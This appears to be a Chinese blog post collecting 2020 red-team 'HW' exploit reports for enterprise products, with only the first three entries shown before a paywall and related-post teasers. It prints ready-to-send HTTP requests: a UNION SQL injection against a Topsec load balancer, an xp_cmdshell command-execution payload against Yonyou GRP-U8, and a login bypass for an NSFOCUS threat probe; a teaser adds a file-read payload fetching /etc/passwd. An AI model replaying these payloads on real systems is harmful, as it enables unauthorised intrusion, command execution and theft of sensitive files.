2020HW期间0day快报集合[ 每日更新 ]

最新推荐文章于 2024-05-29 08:30:53 发布
最新推荐文章于 2024-05-29 08:30:53 发布
阅读量1.7k 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z1feiyu/article/details/108598746
版权

目录

0x01 天融信TopApp-LB 负载均衡系统sql注入

0x02 用友GRP-u8 注入

0x03 绿盟UTS综合威胁探针管理员任意登录

0x04 齐治堡垒机前台远程命令执行漏洞(无需登录)

0x05 泛微OA云桥任意文件读取漏洞

0x06 Exchange Server 远程代码执行漏洞(POC未验证)

0x07 联软科技产品【准入】存在任意文件上传和命令执行漏洞

0x08 通达0A v11.7 后台SQL注入导致RCE

0x09 天融信数据防泄漏系统越权修改管理员密码

0x10 CVE-2020-1472 域内提权

0x11 Pligg远程命令执行 CVE-2020-25287

目前更新至Hw第五天(持续更新)

0x01 天融信TopApp-LB 负载均衡系统sql注入

POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
 
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

0x02 用友GRP-u8 注入

POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache


cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

0x03 绿盟UTS综合威胁探针管理员任意登录

访问后随意输入账户密码,burp发包,对响应包中false更改为true,放包得到回显,其中泄露管理员信息

重新复制账户和MD5密码修改登录包重新发送,即可登录系统

0x04 齐治堡垒机前台远程命令执行漏洞(无需登录)

最低0.47元/天 解锁文章
「已注销」
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微 E Bridge 云桥任意文件读取
nnn2188185的博客
03-25 1179
泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
HW2020-0day总结1
08-03
2.天融信TopApp-LB sql注入 4.绿盟UTS绕过登录 5.WPS命令执行漏洞 6.齐治堡垒机 rce 7.联软准入漏洞 8.泛微云桥任意文件读取
【2024版】最新HW参考 | HVV行动之蓝军经验总结(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
05-29 1168
但是相当多的二级单位或者中型公司,可能没那么专业,然后听从乙方来忽悠,上一堆设备,上大屏展示,图很酷炫,数字很夸张,每天防守几万次攻击,不是说这些没用,而是首先要立足于将产品和服务用好,比如资产梳理,比如防火墙,waf策略优化,这个应该是甲方最基础的事情,也不应该全部交给乙方,有的单位被忽悠上了态势感知,但是连基本的waf策略也没有优化,报表表面上很客观,实际的攻击含金量很低。4.稳扎稳打,有效联动,快速响应,让自己的各种安全设备发挥出最大效能,敌我双方都有漏洞的情况下,就比谁的的响应快谁响应快谁就赢。
泛微云桥e-Bridge-任意文件读取漏洞
chaojixiaojingang
10-09 6437
1.资产查找 Fofa: title="泛微云桥 e-Bridge" 2.漏洞描述 泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 3.漏洞复现 1)Linux服务器 (1)在URL后添加payload payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt (2)在URL后添加/file/fileNo
泛微-SptmForPortalThumbnail-任意文件读取漏洞-day漏洞复现(未公开)
weixin_43167326的博客
01-20 579
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!是一款全面的企业协同办公平台,提供了丰富的功能模块,包括流程管理、文档管理、协作办公、移动办公等。它可以帮助企业实现信息共享、团队协作和业务流程的数字化转型,提高工作效率和合作效能。
data:image/png;base64的使用
热门推荐
凉茶微凉
06-17 62万+
在项目css文件内发现如下代码: #download-button:before { -webkit-margin-end: 4px; background: -webkit-image-set( url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAQAAABKfvVzAAAAO0lEQVQ4y2NgGArg
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
17、畅捷通Plus_ajaxpro命令执行 18、用友NC/Cloud bsh_servlet_BshServlet命令执行 19、金蝶云星空CommonFileserver任意文件读取 20、用友NC/Cloud_Jsinvoke文件上传 21、用友GRP-U8_logs敏感信息泄露 ...
hw_des_descfb_www.2hw3.com_AES_2020_
10-03
标题中的"hw_des_descfb_www.2hw3.com_AES_2020_"似乎代表了一系列与信息技术课程作业相关的活动,涉及到DES(Data Encryption Standard)、DESCFB(可能是指DES的 Cipher Feedback 模式)和AES(Advanced ...
B140QAN01.5_HW0A_Ver1.1.pdf
07-18
【B140QAN01.5_HW0A】是AU OPTRONICS CORPORATION生产的一款14.0英寸QHD(Quad High Definition)16:9彩色TFT-LCD显示器,采用LED背光设计。该模块型号为B140QAN01.5,硬件版本为0A。文档版本为1.1,意味着它可能是...
记一次泛微漏洞分析到发现未公开新漏洞
weixin_42508548的博客
01-10 3570
本来想着分析分析泛微eoffice最新出的漏洞CNVD-2021-49104的,分析分析着,发现代码好像有别的方法也存在..
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微e-Bridge未授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7484
简介 泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="泛微云桥e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
2021-泛微OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
2020HW漏洞总结(三)
weixin_45358803的博客
09-27 7149
来自IDLab整理的漏洞详情 01.联软任意文件上传漏洞 • 已知存在漏洞的url如下: http://IP:80/uai/newDevRegist/updateDevUploadinfo.htm(只有201904-1SP起才存在该漏洞)http://IP:80/uai/download/uploadfileToPath.htm(受影响的版本都存在该漏洞)http://IP:80/uai/newDevRegist/newDevRegist/newDevRegist/…;/…;/updateDevUploa
泛微云桥e-Bridge任意文件读取
MD@@nr丫卡uer
11-28 3766
泛微云桥e-Bridge任意文件读取漏洞 0x00漏洞影响版本: 该漏洞几乎影响2018-2019全版本。 0x01漏洞利用: 默认密码sysadmin/1 fofa搜索语句:title=“泛微云桥” 主要成因 /wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件 构造如下语句 http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/
深信服行为感知命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4735
深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。其实整个过程和深信服EDR命令执行漏洞差不多。其实整个URL和EDR差不多。
【漏洞预警】泛微E-Cology ofsLogin任意用户登陆漏洞
做自己喜欢的事,并将其发挥到极致!
05-17 5093
泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞:泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
绿盟UTS综合威胁探针-2020HW
战神/calmness的博客
10-12 3228
绿盟UTS综合威胁探针管理员任意登录 描述
2022年HW漏洞利用库:实战导向,非0day风险警示
"2022年HW前沿漏洞利用库是一份专门针对IT安全领域的专业文档,它关注的是在2022年可能出现的已知漏洞,而非0-day(零日漏洞)利用。这份文档旨在提高网络安全意识,提供给防御者和安全团队参考,而非用于未经授权的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值